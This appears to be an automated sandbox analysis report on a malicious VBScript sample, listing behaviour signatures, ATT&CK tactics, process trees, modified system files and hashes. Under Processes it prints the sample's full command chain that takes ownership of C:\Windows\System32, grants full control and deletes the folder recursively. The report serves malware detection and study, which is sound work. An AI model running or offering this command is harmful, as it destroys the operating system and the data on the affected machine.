Malware Analysis Report

2024-09-11 06:50

Sample ID 240525-ts67hsac8t
Target file01.vbs
SHA256 c8433f6da3e5358d991d7d57cefcfd69905e2bbd8eab4ddc23d229355dabd1b6
Tags
discovery exploit
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

c8433f6da3e5358d991d7d57cefcfd69905e2bbd8eab4ddc23d229355dabd1b6

Threat Level: Likely malicious

The file file01.vbs was found to be: Likely malicious.

Malicious Activity Summary

discovery exploit

Drops file in Drivers directory

Manipulates Digital Signatures

Possible privilege escalation attempt

Executes dropped EXE

Checks computer location settings

Modifies file permissions

Loads dropped DLL

Checks system information in the registry

Drops file in System32 directory

Enumerates physical storage devices

Checks processor information in registry

Uses Task Scheduler COM API

Modifies registry class

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Enumerates system info in registry

MITRE ATT&CK Matrix V13

Initial Access
TA0001
Execution
TA0002
Persistence
TA0003
Privilege Escalation
TA0004
Defense Evasion
TA0005
File and Directory Permissions Modification
T1222
Credential Access
TA0006
Discovery
TA0007
System Information Discovery
T1082
Query Registry
T1012
Lateral Movement
TA0008
Collection
TA0009
Exfiltration
TA0010
Command and Control
TA0011
Impact
TA0040
Resource Development
TA0042
Reconnaissance
TA0043

Analysis: static1

Detonation Overview

Reported

2024-05-25 16:20

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-25 16:20

Reported

2024-05-25 16:22

Platform

win7-20240419-en

Max time kernel

118s

Max time network

118s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\file01.vbs"

Signatures

Manipulates Digital Signatures

Description Indicator Process Target
File opened for modification C:\Windows\System32\wintrust.dll C:\Windows\System32\cmd.exe N/A

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\System32\WScript.exe N/A
N/A N/A C:\Windows\System32\WScript.exe N/A
N/A N/A N/A N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\dhcpcore.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\rasapi32.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\urlmon.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\ActionCenter.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\imm32.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\en-US\msutb.dll.mui C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\msctf.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\dwmredir.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\dhcpcsvc6.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\lpk.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\resutils.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\slc.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\winlogon.exe C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\bitsigd.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\audiosrv.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\comctl32.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\config\SYSTEM~1.LOG C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\profsvc.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\AudioEng.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\clusapi.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\wbem\wbemsvc.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\winevt\Logs\MIE68D~1.EVT C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\winevt\Logs\MIA934~1.EVT C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\wx6deg.exe C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\BFE.DLL C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\scrobj.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\lsasrv.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\msutb.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\winevt\Logs\MI03A7~1.EVT C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\csrsrv.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\dwmcore.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\ncobjapi.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\QUTIL.DLL C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\webio.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\AudioSes.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\config\SYSTEM C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\taskcomp.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\winsrv.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\basesrv.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\rasdlg.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\scrrun.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\sppwinob.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\powrprof.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\netjoin.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\ntmarta.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\ntshrui.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\prnfldr.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\sppsvc.exe C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\config\DEFAUL~2.LOG C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\snmpapi.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\mfplat.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\fvecerts.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\FWPUCLNT.DLL C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\ntdll.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\user32.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\api-ms-win-downlevel-shlwapi-l2-1-0.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\netman.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\setupapi.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\winevt\Logs\MICROS~4.EVT C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\config\TxR\{01688~1.BLF C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\netcfgx.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\usp10.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\winevt\Logs\MIFC66~1.EVT C:\Windows\System32\cmd.exe N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1008 wrote to memory of 2028 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 1008 wrote to memory of 2028 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 1008 wrote to memory of 2028 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 2028 wrote to memory of 2424 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2028 wrote to memory of 2424 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2028 wrote to memory of 2424 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2028 wrote to memory of 2736 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 2028 wrote to memory of 2736 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 2028 wrote to memory of 2736 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\file01.vbs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c takeown /f C:\Windows\System32 /r /d y && icacls C:\Windows\System32 /grant administrators:F /t && rmdir /s /q C:\Windows\System32

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32 /r /d y

C:\Windows\explorer.exe

"C:\Windows\explorer.exe"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32 /grant administrators:F /t

Network

N/A

Files

\Windows\System32\api-ms-win-downlevel-shell32-l1-1-0.dll

MD5 9108540e866f75c7af2b91dd921a8091
SHA1 8a720258c2617e16e8f8658f84ad929d88b02daa
SHA256 7208c8e05e818781d7f2703b86848fc90651e0d8be10362863250f2283cec511
SHA512 d838ab9210623f85d2c4185e5d18d64c4af51e2482cd839529edc182cee954117d5de7b802ac0de757333e8ed6acf8f1f12bd3627a13e694858074d3f7fbc1b4

\Windows\System32\ieframe.dll

MD5 95951e6a277f78fa13a85f2f408f4c0b
SHA1 97eac55ab4453e21e300852c95daa83ae27a3f12
SHA256 c70d3bcd3200816375e3c1d5e0cf8ec008c4072c3360e7a45bb5433b733f825b
SHA512 3eb102962fedf55767fd0247667d25edf2b05cf98b6ba05ef72d33e1fde1acbb5e6e5d7b8b8c65671399bcabf81496eb487c2b59d14cb12e8bd0852f81917eb1

\Windows\System32\wscript.exe

MD5 8886e0697b0a93c521f99099ef643450
SHA1 851bd390bf559e702b8323062dbeb251d9f2f6f7
SHA256 d73f7ee4e6e992a618d02580bdbf4fd6ba7c683d110928001092f4073341e95f
SHA512 fc4a176f49a69c5600c427af72d3d274cfeacef48612b18cda966c3b4dda0b9d59c0fe8114d5ed8e0fec780744346e2cd503d1fd15c0c908908d067214b9d837

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-25 16:20

Reported

2024-05-25 16:22

Platform

win10v2004-20240426-en

Max time kernel

137s

Max time network

94s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\file01.vbs"

Signatures

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\rteth.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\cdfs.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\filecrypt.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\fsdepends.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\kdnic.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\monitor.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\mouhid.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\pacer.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\afd.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\mslldp.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\netbios.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\rdbss.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\rdpbus.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\Ndu.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\PEAuth.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\tcpipreg.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\usbd.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\usbhub.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\npsvctrig.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\afunix.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\cldflt.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\Diskdump.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\dxgmms2.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\http.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\mrxsmb.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\msfs.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\srv2.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\vwififlt.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\dfsc.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\tdi.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\tdx.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\amdppm.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\condrv.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\csc.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\rspndr.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\CPQSC9~1.SYS C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\mmcss.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\Rtnic64.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\tbs.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\winhvr.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\i8042prt.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\mpsdrv.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\msquic.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\portcls.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\storqosflt.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\bindflt.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\gpuenergydrv.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\udfs.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\watchdog.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\ahcache.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\beep.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\drmk.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\nsiproxy.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\wcifs.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\cimfs.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\hdaudbus.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\hidparse.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\ks.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\null.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\usbehci.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\vhdmp.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\hidusb.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\ksthunk.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\lltdio.sys C:\Windows\System32\cmd.exe N/A

Manipulates Digital Signatures

Description Indicator Process Target
File opened for modification C:\Windows\System32\wintrust.dll C:\Windows\System32\cmd.exe N/A

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Windows\system32\backgroundTaskHost.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\System32\mousocoreworker.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A N/A N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\System32\WScript.exe N/A
N/A N/A C:\Windows\System32\WScript.exe N/A
N/A N/A C:\Windows\System32\WScript.exe N/A
N/A N/A C:\Windows\System32\WScript.exe N/A
N/A N/A C:\Windows\System32\WScript.exe N/A
N/A N/A C:\Windows\System32\WScript.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Checks system information in the registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer C:\Windows\system32\backgroundTaskHost.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName C:\Windows\system32\backgroundTaskHost.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\notificationplatformcomponent.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\DesktopShellExt.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\DriverStore\FileRepository\MSHDC~1.INF\storahci.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\miutils.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\NPSM.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\WinMetadata\Windows.Web.winmd C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\catroot2\edbtmp.log C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\config\SYSTEM~1\AppData\Local\MICROS~1\Windows\WEBCAC~1.DAT C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\lmhsvc.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\winevt\Logs\MIFAE7~1.EVT C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\wbem\wbemess.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\lsass.exe C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\profsvc.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\MoUsoCoreWorker.exe C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\coml2.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\en-US\oleaccrc.dll.mui C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\backgroundTaskHost.exe C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\winevt\Logs\MI82F4~1.EVT C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\catroot2\{F750E~1\catdb C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\cloudAP.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\Windows.CloudStore.Schema.Shell.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\dlnashext.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\ncobjapi.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\config\TxR\{53B39~2.BLF C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\dhcpcsvc6.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\nsisvc.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\security.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\rsaenh.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\BackgroundMediaPolicy.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\en-US\propsys.dll.mui C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\dmxmlhelputils.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\en-US\cmd.exe.mui C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\winevt\Logs\MIFF83~1.EVT C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\wkssvc.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\ClipboardServer.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\dbghelp.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\winevt\Logs\MI8607~1.EVT C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\WinTypes.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\audiosrv.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\cryptxml.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\en-US\windows.storage.dll.mui C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\en-US\win32kbase.sys.mui C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\TimeBrokerServer.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\winevt\Logs\MIDBEC~1.EVT C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\cryptbase.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\cryptnet.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\en-US\dsreg.dll.mui C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\icuuc.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\ntasn1.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\config\SYSTEM~1\AppData\Local\MICROS~1\Office\OTele\OFFICE~1.DB C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\DriverStore\FileRepository\CDROM~1.INF\cdrom.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\kerberos.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\DriverStore\FileRepository\usbport.inf_amd64_254cd5ae09de6b08\usbehci.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\en-US\spoolsv.exe.mui C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\thumbcache.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\AppResolver.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\InputLocaleManager.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\uxtheme.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\config\SAM.LOG1 C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\en-US\combase.dll.mui C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\msprivs.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\Windows.Storage.Search.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\cryptsvc.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\globinputhost.dll C:\Windows\System32\cmd.exe N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\System32\mousocoreworker.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\System32\mousocoreworker.exe N/A

Enumerates system info in registry

Description Indicator Process Target
